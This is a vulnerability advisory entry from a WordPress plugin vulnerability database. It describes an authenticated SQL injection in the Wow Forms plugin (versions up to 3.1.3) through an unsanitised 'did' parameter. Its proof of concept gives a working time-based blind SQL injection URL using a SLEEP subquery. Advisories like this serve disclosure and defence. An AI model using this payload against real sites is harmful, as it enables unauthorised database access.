Lucene search

K
wpvulndbWpvulndbWPVDB-ID:D742AB35-4E2D-42A8-BEBC-B953B2E10E3C
HistoryOct 07, 2021 - 12:00 a.m.

Wow Forms <= 3.1.3 - Admin+ SQL Injection

2021-10-0700:00:00
wpscan.com
3
wow forms
sql injection
admin dashboard

EPSS

0.001

Percentile

45.2%

The plugin does not sanitise or escape a ‘did’ GET parameter before using it in a SQL statement, when deleting a form in the admin dashboard, leading to an authenticated SQL injection

PoC

https://plugins.trac.wordpress.org/browser/mwp-forms/trunk/admin/partials/main.php#L13 As admin, https://example.com/wp-admin/admin.php?page=mwp-forms&amp;info;=del&amp;did;=1 AND (SELECT 9063 FROM (SELECT(SLEEP(5)))YGWC)

EPSS

0.001

Percentile

45.2%

Related for WPVDB-ID:D742AB35-4E2D-42A8-BEBC-B953B2E10E3C